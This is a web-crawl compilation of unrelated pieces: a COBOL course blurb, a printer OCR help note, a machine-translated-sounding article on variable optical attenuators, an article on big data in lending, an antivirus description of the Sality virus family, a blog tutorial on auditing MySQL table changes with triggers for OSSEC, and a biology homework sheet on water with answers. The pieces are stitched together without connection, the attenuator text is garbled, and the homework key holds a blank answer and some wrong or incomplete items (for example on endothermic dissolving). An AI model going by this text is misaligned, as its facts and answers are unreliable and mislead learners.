This hands-on web based training course teaches you how to design and code COBOL programs. It explains basic COBOL constructs and continues through to lessons on strategic modular programming. The course also provides practical tips and best practices used by experienced COBOL professionals that will help you avoid programming pitfalls. | <urn:uuid:f9fcff63-af5d-4285-856c-043f26e8cd88> | CC-MAIN-2017-04 | https://www.microfocus.com/ondemand/course_category/visual-cobol/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00098-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.893777 | 241 | 2.78125 | 3 |
When you scan a document, the scanner is creating an image. The image is one single block of information. You can look at it on your screen and edit it like a photo document, but you cannot edit the text that it contains.
The purpose of the Optical Character Recognition (OCR) function is to allow you to edit, format, or erase the text in the scanned document. NOTE: To enable you to work with the scanned text, the software links the image to your selected word processing application.
For more information, please refer to the driver CD and documentation that came with your Lexmark All-In-One. | <urn:uuid:cb11bfea-1fca-4e82-a006-f78760f09ccb> | CC-MAIN-2017-04 | http://support.lexmark.com/index?page=content&id=FA10&locale=en&userlocale=EN_US | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00218-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903383 | 129 | 2.96875 | 3 |
Variable optical attenuator (VOA) has a wide range of applications in optical communication, and its main function is to reduce or control the optical signal.
The basic characteristics of fiber optic network should be Variable, especially with the application of DWDM transmission systems and EDFA in optical communication, it must be carried out in a plurality of optical signal on the transmission channel gain flattening or equalization, channel power in the optical receiver. The side to be dynamic saturation control, optical networks also need to control for other signals, making the VOA become indispensable key components. In addition, VOA also can be combined with other optical communication components and this pushed itself to the characteristics of the high-level module.
In recent years, there appeared many technologies on manufacture of variable optical attenuator, including mechanical VOA, magneto-optical VOA, LCD VOA, MEMS VOA, thermo-optic VOA and acousto-optic VOA.
The principle is to use a stepper motor drag neutral gradient filter, its output optical power at a predetermined attenuation rule change when the different positions of the light beam passes through the filter, so as to achieve the purpose of adjusting the amount of attenuation. There is also a mechanical polarized optical attenuator. Its basic principle is that the light beam emitted from the ingress port reflected by the reflection sheet to the port, the the reflector coupling efficiency between the two ports by the inclination angle of the reflection sheet to the control, enabling adjustment of the light attenuation. The inclination of the reflection sheet from a variety of different mechanisms to control. Mechanical type optical attenuator is more traditional solutions, so far, the VOA application in the system most used mechanical method to achieve attenuation. The type of optical attenuator with mature technology, optical properties, low insertion loss, polarization dependent loss, without temperature control, etc.; disadvantage is that the larger, more complex structure components, the response rate is not high, it is difficult to automate the production is not conducive to integration.
Magneto-optical VOA is the use of some of the substances in the magnetic field is shown by the changes in optical properties, such as magnetic rotation effect (Faraday effect) can also be achieved attenuation of the light energy, so as to achieve the purpose of adjusting the optical signal. The magneto-optical effect of the material and in combination with other techniques, you can create a high performance, small size, high response and the structure is relatively simple optical attenuator. This is LLL device using discrete technology to produce the optical attenuator to be a further development of the field.
Utilizing a liquid crystal refractive index anisotropy in the liquid crystal VOA shows birefringence. When an external electric field is applied, the orientation of the liquid crystal molecules are rearranged, will result in the change in its transmission characteristics. The type of attenuation can be achieved by light intensity change of the type of voltage control is applied to the two electrodes in the liquid crystal. The liquid crystal optical attenuator VOA can achieve the miniaturization and high response. But at the same time the liquid crystal material into a larger loss, the production process is relatively more complex, in particular, is influenced by environmental factors, its advantage is a low cost, there are commercial batch.
MEMS is the technology of the new applications in this area, After several years of development, the MEMS chip production process has become more mature, a strong impetus to the application of the MEMS optical attenuator. Optical network applications, MEMS technology-based products also have the obvious advantage on price and performance. MEMS VOA has been very mature, and mass production and large-scale application. Because of yield problems, in terms of price also facing challenges In addition, micro-electro-mechanical components, reliability is sometimes less than ideal. The early MEMS VOA using laser welding, into a larger device, and the production efficiency is low, and high assembly costs. Currently, the market also introduced a MEMS VOA plastic technology, a good solution to this problem.
Thermo-optic VOA mainly using some of the material changes in the optical properties of temperature field characteristics, such as temperature changes caused by the thermo-optical refractive index change. According to the structure of the different, can be divided into two categories, leak-and open-light type VOA. Thermo-optic VOA due to heating, cooling device is relatively complex, a function of the mathematical relationship between the temperature field photoconductive medium refractive index is complex and difficult to accurately quantify and control, especially the longer response time hindered its application in modern optical communication .
The basic principle is to use the cyclical strain, resulting in a periodic variation of the refractive index, equal to create a phase grating for the acousto-optical crystal in the generated under the action of ultrasonic waves, and so can be modulated using the raster beam. Some companies have already claimed to have developed the acousto-optical crystal variable attenuator (called the AVOA). It is understood that the acquisition of the acousto-optic crystal material is no problem, but at this stage of the total cost is high, about 4-5.
Variable optical attenuator is one of important optical devices in the optical communication system. Over the years, it has been stuck at a mechanical level. Because its size is not conducive to integration, it is generally only suitable for single-channel attenuation. With the development of DWDM system, as well as market the flexibility to upgrade reconfigurable optical add-drop multiplexer (ROADM) potentially huge demand, there need more channels and small size variable optical attenuator array, in particular the integrated VOA product. Traditional mechanical methods can not solve these problems. With the development of fiber optic network, VOA’s development trends are: low cost, highly integrated, fast response time as well as integration of hybrid with other optical communication devices. | <urn:uuid:9312116c-4c2e-4d4a-bd62-3b957787e8aa> | CC-MAIN-2017-04 | http://www.fs.com/blog/several-variable-optical-attenuator-introduction.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00126-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.909476 | 1,265 | 3.03125 | 3 |
In much the same way the internet transformed the banking industry through the introduction of online banking, big data stands to revolutionize how loans are handled. Think about the headaches you have to go through when getting a loan for a car, home, or new business. There’s bound to be piles of paperwork you need to fill out, some of which may require a law degree to fully understand. That’s not to mention the discussions you’ll need to have with loan officers and the many visits you’ll need to pay to the bank. Much of that is changing now as big data gets used for approving people for loans. It’s a new way to evaluate risk that helps give people with no credit the chance to get those loans that can change their lives.
When speaking of online lending using big data, it’s important to point out that one of the major benefits not only means getting approved for a loan when you otherwise might not. With big data, loans can get approved much more quickly, bypassing the hours usually needed in the more traditional way. It’s a quick process that in some instances can actually lead to lower interest rates when compared to market averages. Needless to say, it’s an appealing option that many will be drawn to, especially younger generations used to conducting their business in digital form.
Banks and lending institutions are not charities, though. When dealing with loans, the name of the game is risk. These organizations want to evaluate how likely you are to repay the money they give you, plus interest. That’s where big data plays its biggest role. Whereas most banks and credit unions will look at your credit score to determine how risky lending money to someone is, many startup lending companies use different — and some would say unorthodox — methods. With a combination of big data and machine learning capabilities, they can figure out the likelihood you’ll repay a loan through some unlikely factors that you may not have thought of.
Have you ever given much thought to the time of day you ask for a loan? What about how many emails you send out every day? Did you know that your Facebook friends could determine how likely you are to repay a loan? Some of these items may seem unimportant, but through big data analytics, experts have found that they provide signs of whether lending money to a person or business is risky. As more institutions embrace big data and Hadoop on cloud, they’re finding that these seemingly innocuous elements may be more accurate than the usual credit score in determining repayment reliability. If it takes you a while to input an email address, for example, big data has shown that may be indicative that you’re using a new email for the express purpose of applying for the loan (which is usually not a good sign). And they’ve also found that Apple users are less risky to lend to. Make of that what you will.
Based off of these and other factors, people are able to be approved for online loans, even if they don’t have a credit score. From this perspective, it’s easy to see how big data can be seen as a blessing for those who would be shut out of the process under normal circumstances. As helpful as these types of loans can be, it’s important to note that for now, most of them are designed for the short-term, and even though interest rates can be lower, some of those same factors may lead to loans with higher rates. It’s all done in a case by case basis, but when these alternative lenders approve up to 60 percent of loans for small business when the average is 20 percent for other organizations, the option can’t be dismissed.
The use of big data in this way, however, is not without controversy. Being denied alone because your friends on Facebook with the wrong people strikes many as absurd. Not to mention that this delves into personal details more than usual, which may feel like an intrusion on privacy. Despite these concerns, big data is clearly the future for loans. Big banks are no stranger to big data analytics, so it’s likely only a matter of time before they adopt similar processes.
Rick Delgado is a technology commentator and freelance writer.
Subscribe to Data Informed for the latest information and news on big data and analytics for the enterprise, plus get instant access to more than 20 eBooks. | <urn:uuid:cdd28849-9538-4488-bba3-a776b0bb2851> | CC-MAIN-2017-04 | http://data-informed.com/how-big-data-will-transform-the-lending-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00520-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95734 | 905 | 2.609375 | 3 |
Sality refers to an old, large family of viruses that infect executable files. Over the years, new functionalities have been added to the malware to keep it active and current. Modern Sality variants can, among other things, act as a backdoor and connect infected machines to a botnet.
Depending on the settings of your F-Secure security product, it will either automatically delete, quarantine or rename the suspect file, or ask you for a desired action.
More scanning & removal options
More information on the scanning and removal options available in your F-Secure product can be found in the Help Center.
You may also refer to the Knowledge Base on the F-Secure Community site for more information.
The Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.
Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.
Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.
Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.
Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
For representative examples of Sality viruses, see the following descriptions:
Description Created: 2010-05-04 08:33:51.0
Description Last Modified: 2015-08-13 08:11:38.0 | <urn:uuid:1f9d99f0-cfbe-4186-8f3f-232af00e0e33> | CC-MAIN-2017-04 | https://www.f-secure.com/v-descs/virus_w32_sality.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00062-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93898 | 577 | 2.640625 | 3 |
By Andrew Zonenberg @azonenberg
In the post “Reading CMOS layout,” we discussed understanding CMOS layout in order to reverse-engineer photographs of a circuit to a transistor-level schematic. This was all well and good, but I glossed over an important (and often overlooked) part of the process: using the photos to observe and understand the circuit’s actual geometry.
Let’s start with brightfield optical microscope imagery. (Darkfield microscopy is rarely used for semiconductor work.) Although reading lower metal layers on modern deep-submicron processes does usually require electron microscopy, optical microscopes still have their place in the reverse engineer’s toolbox. They are much easier to set up and run quickly, have a wider field of view at low magnifications, need less sophisticated sample preparation, and provide real-time full-color imagery. An optical microscope can also see through glass insulators, allowing inspection of some underlying structures without needing to deprocess the device.
This can be both a blessing and a curse. If you can see underlying structures in upper-layer images, it can be much easier to align views of different layers. But it can also be much harder to tell what you’re actually looking at! Luckily, another effect comes to the rescue – depth of field. | <urn:uuid:afde65d7-bb4e-4c97-ac50-9da32b5945e8> | CC-MAIN-2017-04 | http://blog.ioactive.com/2016_03_01_archive.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00088-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917874 | 277 | 3.203125 | 3 |
Databases are a core component in lot of applications and websites. Almost everything is stored in databases. Let’s take a standard e-commerce website, we can find in databases a lot of business critical information: about customers (PII), articles, prices, stocks, payment (PCI), orders, logs, sessions, etc. Like any component of an IT infrastructure, databases must be properly monitored from a security point of view. There are often an Achille’s heel due to security issues. Common problems are a lack of access control on the SQL commands allowed or bad passwords. All databases have mechanisms to log events related to sessions (login, logout) or system but what about the detection of unauthorized modifications of data stored in tables? Those can compromise the database integrity. How to implement such controls with a very common database server (MySQL)?
Of course, MySQL already implements some logging features, configured via your my.cnf file or the command line. There are five types of logs available in MySQL:
- Error log: contains the events related to the MySQL daemon
- General query log: contains the client connection and queries
- Binary log: contains the changes applied to data (for rollback & replication)
- Relay log: contains the changes performed during replication
- Slow query log: contains the queries that took more time than expected
The most important log is the query log but it is a “performance killer“: all logged queries may use a lot of resources (CPU, storage) and the amount of events to process could be a pain to process.
Basically, I would like to monitor all changes performed on a specific table called “users” which contains the credentials of all users allowed to use an application. From a SQL point of view, three commands must be monitored: “INSERT”, “UPDATE” and “DELETE”. Of course, changes will be reported by OSSEC (why change a winning team?).
MySQL has two interesting features which be very helpful to achieve this:
- Triggers – From the MySQL website, a trigger is defined as is “a named database object that is associated with a table, and that activates when a particular event occurs for the table“. An example of trigger is copying all new inserted records in table “A” to table “B” for backup purpose.
- UDF (“User Defined Functions“) – UDF is a powerful way to extend the features of a MySQL server. New functions are added via shared libraries (example of UDF: statistical functions, strings manipulations). There is an online repository of free UDS called mysqludf.org.
Triggers will be defined on the table(s) we need to monitor. One trigger per command which could alter the data integrity: insert, update and delete. As I’m not a SQL expert, I found an interesting paper from Peter Brawley about “Transaction time validity in MySQL” (link). In his paper, Peter explains how to keep an audit trail of the changes performed on a table by inserting new rows in a “log” table each time a change is performed on the main one. But, there is a major issue: our changes are logged into MySQL and OSSEC cannot directly read a MySQL table. My first idea was to use an active-response script to dump the data but it looked too much resources consuming. On the other side, OSSEC is a king to parse text files. Unfortunately, new problem, a query like “SELECT … INTO OUTFILE xxx” does not work from triggers and the output file cannot already exists for security reasons.
Another way to interact with the file system is by using UDF. The mysqludf.org site has very interesting stuff. Let’s have a look at lib_mysqludf_log which does exactly what we need: It creates a new function called log_error() which writes the string passed as argument into the MySQL error log. OSSEC could now access all relevant information via this file. One picture is worth a thousand words, here is how the integrity checks will be performed:
Let’s implement the whole stuff…
First, install the lib_mysqludf_log.so shared library (Note that the MySQL development environment is required):
# cd /tmp # wget http://www.mysqludf.org/lib_mysqludf_log/lib_mysqludf_log_0.0.2.tar.gz # tar xzvf lib_mysqludf_log_0.0.2.tar.gz # gcc -I/usr/include/mysql -shared -fPIC -o lib_mysqludf_log.so lib_mysqludf_log.c # cp lib_mysqludf_log.so /usr/lib/mysql/plugin # service mysql restart
Once done, enable the new function (this must be performed for each database you would like to monitor):
# mysql -u user -p mysql> create database acme; mysql> use acme; mysql> create function lib_mysqludf_log_info -> returns string soname 'lib_mysqludf_log.so'; mysql> create function log_error -> returns string soname 'lib_mysqludf_log.so';
To test, launch a ‘tail -f errors.log’ in a shell, and send the following query to your MySQL server:
mysql> use acme; mysql> select log_error("foobar"); +---------------------+ | log_error("foobar") | +---------------------+ | NULL | +---------------------+ 1 row in set (0.00 sec)
You should see the string “foobar” appended at the end of the errors.log. The SQL output is normal and can be simply ignored. Now, we have a simple way to write data that will be parsed by OSSEC. Let’s create some triggers. In the example below, I need to monitor the table containing user credentials (to access a web application). Any change which could alter the table integrity must be reported. First, we create the table ‘users’ then we add one trigger per action.
We also need to create a fake table (called “dummy” in the example below) because the triggers need to execute a fake insert query. This table will always remains empty. Alternatively, you can use an existing table.
# mysql -u root -p acme mysql> create table users ( -> id int primary key auto_increment, -> login char(20) not null, -> password char(20) not null); mysql> create table dummy ( -> fake char(1) not null); mysql> create trigger users_insert after insert on users -> for each row -> insert into dummy values( -> log_error(concat(now()," Table: acme.users: insert(", -> NEW.id,",",NEW.login,",",NEW.password,") by ",user()))); mysql> create trigger users_delete after update on users -> for each row -> insert into dummy values( -> log_error(concat(now()," Table: acme.users: update(", -> NEW.id,",",NEW.login,",",NEW.password,") by ", user()))); mysql> create trigger users_delete after delete on users -> for each row -> insert into dummy values( -> log_error(concat(now()," Table: acme.users: delete(", -> OLD.id,",",OLD.login,",",OLD.password,") by ", user())));
Our newly implemented function log_error() is very basic and does not allow to format the string with variables. We have to use the concat() SQL function to build a single string containing the original fields as well as interesting information like a timestamp and the logged-in user. From a security point of view, the fields are passed directly to the log_error() function without further checks! Don’t forget that all data stored in a database must be properly sanitized by the application. It’s time to test:
# mysql -u root -p acme mysql> insert into users values(7, "xavier", encrypt("password")); mysql> update users set password=encrypt("newpassword") where id=7; mysql> delete from users where id=7;
The results will be immediately written in the MySQL errors.log:
# tail -f errors.log 2011-01-07 16:38:30 Table: acme.users: insert(7,xavier,zZDDIZ0NOlPzw) by admin@localhost 2011-01-07 16:38:35 Table: acme.users: update(7,xavier,RjdqndSkxdjeX) by admin@localhost 2011-01-07 16:38:53 Table: acme.users: delete(7,xavier,RjdqndSkxdjeX) by admin@localhost
The last step is to configure your OSSEC server/agent to handle the new events. Create a new rule in your local_rules.xml and configure your server/agent to process the errors.log file:
<!-- MySQL Integrity check --> <rule id="100025" level="7"> <regex>^\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d Table: \.</regex> <description>MySQL users table updated</description> </rule> <localfile> <log_format>syslog</log_format> <location>/var/lib/mysql/errors.log</location> </localfile>
And the final result, an OSSEC notification:
OSSEC HIDS Notification. 2011 Jan 08 00:31:24 Received From: (xxxxx) xx.xxx.xxx.xxx->/var/lib/mysql/errors.log Rule: 100025 fired (level 7) -> "MySQL users table updated" Portion of the log(s): 2011-01-08 00:31:24 Table: acme.users: insert(8,brian,qavXvxlEVykwm) by admin@localhost --END OF NOTIFICATION
This is a simple example of data changes audit in databases. Remember that auditing database transactions has a huge impact on performance and is not practical. This method does not impact your server performances and do not pollute your logs. As usual, this must be seen as a proof-of-concept. Comments are welcome! | <urn:uuid:5ba3332b-58b1-43d6-97db-f9b7dc6d45ba> | CC-MAIN-2017-04 | https://blog.rootshell.be/2011/01/07/auditing-mysql-db-integrity-with-ossec/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00484-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.825971 | 2,292 | 2.71875 | 3 |
What email address or phone number would you like to use to sign in to Docs.com?
If you already have an account that you use with Office or other Microsoft services, enter it here.
Or sign in with:
Signing in allows you to download and like content, which the author will be aware of.
Embed code for: Chap 3 HW Water Answers (9)
Select a size
Chapter 3 Water: Homework
1) The atoms in a water molecule are held together by covalent bonds. This means that the bonded atoms
2) Which statement is true about hydrogen bonds between water molecules? A) They are about as strong as the covalent bonds in a water molecule. B) They arise because of the linear geometry of water. C) They cause water to have an unusually low freezing point for its molecular weight. D) They involve the unequal sharing of a proton between water molecules. E) In liquid water the same molecules attract to each other over long time periods.
3) The abundance of water in the cells and tissues helps to minimize temperature fluctuations. This is due to what property of water? A) Density. B) Viscosity. C) Specific heat. D) Boiling point.
4 ) Compounds that ionize when dissolved in water are called ________. A) electrolytes B) polar compounds C) hydrophobic compounds D) amphipathic compounds 5) Poorly soluble molecules such as lipids and nucleoside bases can be made more soluble in cells by attaching ________ to them. A) water B) oxygen C) carbohydrates D) salt ions 6) Electrolytes dissolve readily in water because A) they are held together by electrostatic forces. B) they are hydrophobic. C) water molecules can cluster about cations. D) water molecules can cluster about anions. E) water molecules can cluster about cations and anions. 7) A molecule or ion is said to be hydrated when it ________. A) is neutralized by water B) is surrounded by water molecules C) reacts and forms a covalent bond to water D) aggregates with other molecules or ions to form a micelle in water 8) If liquid A is more polar than liquid B, you might expect
Liquid A to evaporate faster than liquid B
Liquid A to evaporate more slowly than liquid B
Liquid A and liquid B to evaporate at the same rate
d) Liquid B to be colored
9) Solutes diffuse more slowly in cytoplasm than in water because of A) the higher viscosity of water. B) the higher heat of vaporization of water. C) the presence of many crowded molecules in the cytoplasm. D) the absence of charged molecules inside cells. 10) The ________ pressure is the pressure required to prevent the flow of solvent through a solvent-permeable membrane that separates two solutions of different solute concentration. A) hydrostatic B) electromotive C) osmotic D) partial 11) Which is true about the solubility of electrolytes in water? A) They are all insoluble in water. B) They are usually only sparingly soluble in water. C) They often form super-saturated aqueous solutions. D) They readily dissolve and ionize in water.
12) The water molecule is
Slightly negative near the hydrogen atoms and slightly positive near the oxygen atom
Slightly positive in all areas of the molecule
Slightly negative near the oxygen atom and slightly positive near the hydrogen atoms
The same charge in all areas of the molecule
13) A paper clip can stay on the surface of a sample of water because of water’s strong surface tension. Water’s surface tension is mostly a result of
The motion of water molecules
The attraction of water molecules
The impurities in the water
14) Sodium chloride is made up of sodium ions and chloride ions which bond together in a salt crystal because
They have the same charge
They are the same size
One is positive and one is negative so they attract
They both have protons and electrons
15) Water is able to dissolve sodium chloride because
The polar areas of water molecules attract the oppositely charged ions of sodium chloride
The shape of the water molecules pushes the sodium and chloride ions apart
The oxygen in the water molecules reacts with the sodium and chloride ions
Water molecules and sodium chloride are covalently bonded
16) Water cannot dissolve all substances that are made from ionic bonds. This is probably because
Some water molecules are not as strong as others
Water needs to be stirred to dissolve all ionic substances
Some ionic bonds are too strong for the attractions of water molecules to pull them apart
Water needs to be heated to dissolve all ionic substances
17) The chemical formula for sucrose (sugar) is C6H12O6. In some parts of the sucrose molecule, oxygen is covalently bonded to hydrogen. This makes the sucrose molecule
Bonded like salt
Smaller than a water molecule
A polar molecule
Act like a liquid
18) Sucrose dissolves well in water because
Water is usually warm
Sucrose is used to make sweet beverages
Polar water molecules attract the opposite polar areas of the sucrose molecules
Polar water molecules attract the carbon atoms in the sucrose molecules
19) When sucrose dissolves in water
The sucrose molecules break apart into individual atoms
The water molecules covalently bond to the sucrose molecules
The water molecules cause the sucrose molecules to separate from one another
Each sucrose molecule breaks in half
20) Alcohol molecules are not as polar as water molecules. If you mixed sucrose in alcohol you might expect the sucrose
To dissolve better in alcohol than in water
To dissolve in alcohol not as well as in water
To dissolve equally well in alcohol and in water
To increase in size
21) Water is not a good dissolver of oil mainly because
Oil is also a liquid
Oil is thicker than water
Oil molecules are non-polar
Oil is colder than water
22) Carbon dioxide gas dissolves pretty well in water because
The molecules of a gas are far apart compared to the molecules of a liquid
The bond between the carbon and oxygen in the carbon dioxide is polar
Water can dissolve anything with carbon
Water molecules are non-polar
23) The amount of gas that can dissolve in water
Increases as the temperature of the water increases
Increases as the temperature of the water decreases
Does not change when the temperature of the water changes
Does not depend on the type of gas
24) When certain substances dissolve, the solution gets warmer. This type of dissolving process is exothermic. In exothermic dissolving
More energy is released when water molecules bond to the solute than is used to pull the solute apart.
More energy is used to pull the solute apart than is released when water molecules bond to the solute.
A gas is always produced
The temperature does not change
25) When certain substances dissolve, the solution gets colder. This type of dissolving process is endothermic. In endothermic dissolving
Water molecules break apart into atoms
26)What does it mean to say that something is a “polar molecule”?
A polar molecule has a net dipole as a result of the opposing charges (i.e. having partial positive and partial negative charges) from polar bonds arranged asymmetrically. Water (H2O) is an example of a polar molecule since it has a slight positive charge on one side and a slight negative charge on the other.
27) What is surface tension and why does water have a strong surface tension?
In a sample of water, there are two types of molecules. Those that are on the outside, exterior, and those that are on the inside, interior. The interior molecules are attracted to all the molecules around them, while the exterior molecules are attracted to only the other surface molecules and to those below the surface. This makes it so that the energy state of the molecules on the interior is much lower than that of the molecules on the exterior. Because of this, the molecules try to maintain a minimum surface area, thus allowing more molecules to have a lower energy state. This is what creates what is referred to as surface tension.
28) You put a drop of water and a drop of alcohol on a paper towel and saw that the alcohol evaporated faster than the water. Alcohol molecules are not as polar as water molecules. Use the difference in polarity between water and alcohol molecules to explain why alcohol evaporates faster than water.
A more polar molecule will have stronger attractive forces between its molecules than a liquid with weaker polarity. It will require more energy to break the lattice of the liquid with the greater polarity. Therefore alcohol will require less energy to break its lattice and evaporate faster.
29) The surface of water bends but doesn’t break under the weight of a paper clip or water strider. What is it about water molecules and the way they interact that gives water this strong surface tension?
The strong polarity of water will produce large numbers of hydrogen bonds forming a strong lattice.
30) You put drops of water and alcohol on the surface of two pennies. The water held together and beaded up more than the alcohol. Also, more drops of water than alcohol stayed on the penny. If water molecules are more polar than alcohol molecules, explain why this happened.
The strong polarity of water will produce large numbers of hydrogen bonds forming a strong lattice. This will keep the water molecules together forming a bead.
31) Briefly explain, on the molecular level, how water dissolves salt.
On addition to water the Na+ section of NaCl is attracted to the oxygen side of the water molecules, while the Cl- side is attracted to the hydrogens' side of the water molecule. his causes the sodium chloride to split in water, and the NaCl dissolves into separate Na+ and Cl- atoms. A hydration shell is formed around them which prevents Na+ and Cl- to form ionic bonds.
32) Why does water dissolve salt more effectively than isopropyl alcohol does?
Water is more polar than isopropyl alcohol.
33) Why does sugar not dissolve in mineral oil?
Mineral oil is a lipid and is nonpolar. Sugar is a polar molecule. Polar molecules will not dissolve in nonpolar liquids..
34) Why does increasing the temperature cause more solute to dissolve in a solvent?
The movement of the molecules (kinetic energy) in a solvent increases with increasing temperature. The force of the collisions with a solute are greater enabling the solute to dissolve faster.
35) What are the four emergent properties of water that are important for life?
cohesion, expansion upon freezing, high heat of evaporation, capillarity
cohesion, moderation of temperature, expansion upon freezing, solvent properties
moderation of temperature, solvent properties, high surface tension, capillarity
heat of vaporization, high specific heat, high surface tension, capillarity
polarity, hydrogen bonding, high specific heat, high surface tension
36) Water shows high cohesion and surface tension and can absorb large amounts of heat because of large numbers of which of the following bonds between water molecules?
strong ionic bonds
nonpolar covalent bonds
polar covalent bonds
weak ionic bonds
37) Water has an unusually high specific heat. What does this mean?
At its boiling point, water changes from liquid to vapor.
More heat is required to raise the temperature of water.
Ice floats in liquid water.
Salt water freezes at a lower temperature than pure water.
Floating ice can insulate bodies of water.
38) In a glass of old-fashioned lemonade, which is the solvent?
39) Compared to an acidic solution at pH 5, a basic solution at pH 8 has
1.000 times more hydrogen ions.
1.000 times less hydrogen ions.
100 times less hydrogen ions.
the same number of hydrogen ions but more hydroxide ions.
100 times less hydroxide ions.
40) Which of the following acts as a pH buffer in blood?
A and B
41) Scientists predict that acidification of the ocean will lower the concentration of dissolved carbonate ions (CO32), which are required for coral reef calcification. To test this hypothesis, what would be the independent variable?
the rate of calcification
the amount of atmospheric CO2
volume of seawater
42) Based on this graph, what is the relationship between carbonate ion concentration and calcification rate?
As the acidity of the seawater increased, the rate of calcification decreased.
As the rate of calcification increased, the concentration of carbonate ions increased.
As the concentration of carbonate ions increased, the rate of calcification decreased.
As the concentration of carbonate ions increased, the rate of calcification increased.
43) If the seawater carbonate ion concentration is 250 µmol/kg, what is the approximate rate of calcification according to this graph?
5 mmol CaCO3 per m2 per day
10 mmol CaCO3 per m2 per day
15 mmol CaCO3 per m2 per day
20 mmol CaCO3 per m2 per day
44) This figure suggests that increased atmospheric concentrations of CO2 will slow the growth of coral reefs. Do the results of the previous experiment support that hypothesis?
No; more atmospheric CO2 causes a decrease in the amount of CO32 in seawater, leading to faster reef growth.
Yes; more CO2 causes an increase in the amount of CO32 in seawater, leading to slower reef growth.
No; more atmospheric CO2 causes an increase in the amount of CO32 in seawater, leading to faster reef growth.
Yes; more CO2 causes a decrease in the amount of CO32 in seawater, leading to slower reef growth.
45) In a single molecule of water, two hydrogen atoms are bonded to a single oxygen atom by _____.
A) hydrogen bonds
B) nonpolar covalent bonds
C) polar covalent bonds
D) ionic bonds
46) The partial negative charge at one end of a water molecule is attracted to the partial positive charge of another water molecule. What is this attraction called?
A) a covalent bond
B) a hydrogen bond
C) an ionic bond
D) a van der Waals interaction
47) The partial negative charge in a molecule of water occurs because _____.
A) the oxygen atom donates an electron to each of the hydrogen atoms
B) the electrons shared between the oxygen and hydrogen atoms spend more time around the oxygen atom nucleus than around the hydrogen atom nucleus
C) the oxygen atom has two pairs of electrons in its valence shell that are not neutralized by hydrogen atoms
D) one of the hydrogen atoms donates an electron to the oxygen atom
48) Water molecules can form hydrogen bonds with _____.
A) compounds that have polar covalent bonds
C) oxygen gas (O2) molecules
D) chloride ions
49) Which of the following is a property of liquid water? Liquid water _____.
A) is less dense than ice
B) has a specific heat that is lower than that for most other substances
C) has a heat of vaporization that is higher than that for most other substances
D) is nonpolar
50) Which of the following can be attributed to water's high specific heat?
A) Oil and water do not mix well.
B) A lake heats up more slowly than the air around it.
C) Ice floats on water.
D) Sugar dissolves in hot tea faster than in iced tea.
51) The cities of Portland, Oregon, and Minneapolis, Minnesota, are at about the same latitude, but Minneapolis has much hotter summers and much colder winters than Portland. Why?
A) They are not at the same exact latitude.
B) The ocean near Portland moderates the temperature.
C) Fresh water is more likely to freeze than salt water.
D) Minneapolis is much windier, due to its location in the middle of North America.
52) To act as an effective coolant in a car's radiator, a substance has to have the capacity to absorb a great deal of heat. You have a reference book with tables listing the physical properties of many liquids. In choosing a coolant for your car, which table would you check first?
B) density at room temperature
C) heat of vaporization
D) specific heat
53) Water has many exceptional and useful properties. Which is the rarest property among compounds?
A) Water is a solvent.
B) Solid water is less dense than liquid water.
C) Water has a high heat capacity.
D) Water has surface tension.
54) Which of the following effects can occur because of the high surface tension of water?
A) Lakes cannot freeze solid in winter, despite low temperatures.
B) A raft spider can walk across the surface of a small pond.
C) Organisms can resist temperature changes, although they give off heat due to chemical reactions.
D) Sweat can evaporate from the skin, helping to keep people from overheating.
55) Which of the following takes place as an ice cube cools a drink?
A) Molecular collisions in the drink increase.
B) Kinetic energy in the liquid water decreases.
C) A calorie of heat energy is transferred from the ice to the water of the drink.
D) The specific heat of the water in the drink decreases.
56) Which type of bond must be broken for water to vaporize?
A) ionic bonds
B) polar covalent bonds
C) hydrogen bonds
D) both polar covalent bonds and hydrogen bonds
57) Why does ice float in liquid water?
A) The high surface tension of liquid water keeps the ice on top.
B) The ionic bonds between the molecules in ice prevent the ice from sinking.
C) Stable hydrogen bonds keep water molecules of ice farther apart than water molecules of liquid water.
D) The crystalline lattice of ice causes it to be denser than liquid water.
58) Hydrophobic substances such as vegetable oil are _____.
A) nonpolar substances that repel water molecules
B) nonpolar substances that have an attraction for water molecules
C) polar substances that repel water molecules
D) polar substances that have an affinity for water
